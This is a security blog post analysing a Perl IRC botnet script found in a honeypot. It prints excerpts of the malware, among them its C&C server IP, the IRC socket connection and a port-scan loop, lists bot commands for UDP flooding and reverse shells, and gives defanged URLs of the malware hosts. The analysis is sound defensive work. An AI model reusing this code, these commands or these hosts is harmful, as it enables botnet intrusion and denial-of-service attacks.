Botnet analysis based on IRC network

Published at February 18, 2019 – 5 min read

With one of my many honeypots actived around the world wide web, I discovered an interesting script written with the famous Perl programming language. This Perl script is a malware used to remotely control a machine, opening what is technically called backdoor. If this malicious program runs on multiple machines, there is a possibility that the attacker may have created a botnet.

At first, a botnet is a network controlled by a bots master and composed of devices infected with specialized malware, called bots or zombies (“Computer zombie”).

Devices connected to the Internet within which there are vulnerabilities in their infrastructure can sometimes become part of the botnet, even if they do not have the malware installed. Through the backdoor, the botmaster can control the system via remote access. Thus infected computers can launch attacks, named, Distributed Denial of Service against other systems or perform other illicit operations.

How it works is relatively simple. Once the machine has been infected, the malware has to listen to the attacker’s remote instructions. There is therefore a sort of node, also called C&C (command and control), which gives “orders” executed by the infected machines.

And there we have the first problem. The centralization of the control point, also called C&C. The central node has to be safe, away from any ISPs and application such as firewalls and antivirus who might notice and block the attack. The authors use various techniques to try to make themselves “invisible” to the user and firewall.

Then the solution is easy: using a decentralized network. No, I’m not talking about using blockchain for botnet (even it’s a funny idea). Some hackers (if they can be defined) use peer-to-peer protocols, and others one use IRC too. And it is IRC that I will go to discuss.

In fact, the malicious program is listening to commands by connecting to a private channel or private chat using the open IRC network. Through the conversation channel, the author is able to control all the infected systems which are listening to the channel. The unknown attacker can be tens of thousands, and to give an order, requiring screen images, credentials and much more.

The program

The program is a clear example of the attempt to add the infected machine to a botnet. Through this post, we will analyze step by step the implemented code. At the beginning of the script we can find interesting variables, useful for connecting to the IRC service.

my @mast3rs = ("z","w","x");
my @hostauth = ("localhost");
my @admchan=("#ssh");
my @server = ("91.191.19.205");

@mast3rs sounds like an unknown array, but only at the end will we understand what it might be; @hostauth would seem to indicate a sort of auth; @admchat specifies an IRC channel, while @server defines the IP of the IRC server to which the machine must connect.

In this excerpt, we have further confirmation of using an IRC socket to communicate with the attacker.

my $IRC_socket = IO::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);`

The username for IRC is generated by joining the @nickname variable with a random number.

my @nickname = ("b");
sub getnick {
        return "$nickname[rand scalar @nickname]".int(rand(20000));
}

Once the machine is connected to IRC, the program is ready to receive information. The attacker (which is operator on IRC) calls the “X” function. For each existing function, a command to be executed is associated. Each function is defined with a regex, here a summary table.

CommandExampleHow it works
ps IPps 127.0.0.1Scanning of open ports on the ip. The ports are hard-encoded on the script (array @portas).
nmap IP initial_range final_rangenmap 127.0.0.1 27 40Scanning of open ports on the specified ip. The function supports a range.
rmrmClean - removing the malware.
versionversionPriting malware version
download filedownload home.txtDownload a file from the infected device.
udp IP port time (ms)udp 127.0.0.1 20 400Sending flood-based attack via UDP packets.
back IP portback 171.2.19.201 80Install a reverse shell.

For example, with the “pv” command, the infected device is a port scanning to find out if any ports are open (ports are defined on the @portas array). The nmap command also serves the same thing, but the ports are specific to a range of values.

my @portas=("21","22","23","25","53","80","110","113","143","3306","4000","5900","6667","6668","6669","7000","10000","12345","31337","65501");`

This code will check if the port is opened. Simply $scansock is TRUE only when the port returns a valid response.

foreach my $porta (@portas)  {
my $scansock = IO::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => $portime);
if ($scansock) {
        ....
}

If $scansock is valid, the script will send a private message to $printl

sendraw($IRC_cur_socket, "PRIVMSG $printl  $porta"."/Open");

Reporting

Once you find any malware, you should report the various IPs related to the possible illegal activity and the malware itself. In all likelihood, the attack will be (more or less) stopped since there is usually a connected domain / ip and the fact can be reported to the third parties.

Then I’ve tried to join to this IRC server.

16:31 [912]  -!- **Irssi:** Connection to **91.191.19.205** established
16:31 [912]  -!- !unreal.org  *** Looking up your hostname...
16:31 [912]  -!- !unreal.org  *** Couldn't resolve your hostname; using your IP address instead
16:31 [912]  -!- /list LIST command
16:31 [912]  -!- Channel User 
16:32 [912]  -!- #ircd 1132 [+sntu]
16:32 [912]  -!- #aka 85 [+sntu]
16:32 [912]  -!- #ph1 261 [+sntu]
16:32 [912]  -!- #ssh 46 [+sntu]

Over 1500 connected machines (considering each user as an infected machine), all users are “invisible” to anyone, except to the administrators of the network. So, I proceeded to report the fact on Twitter.

Then the IRC server banned me :- ( .

Details

Server IRC: hxxp://91.191.19.205 Perl scripts: hxxp://192.241.243.77/tar hxxp://94.23.19.166/hit

About the author

SerHack is a security engineer, developer, and writer. He is contributing to the Monero project, a cryptocurrency focused on preserving privacy for transactions data. In his publications, Mastering Monero has became one of the best rated resources to learn about Monero.

Next post: Unpacking ASIC firmware: AntMiner Exploited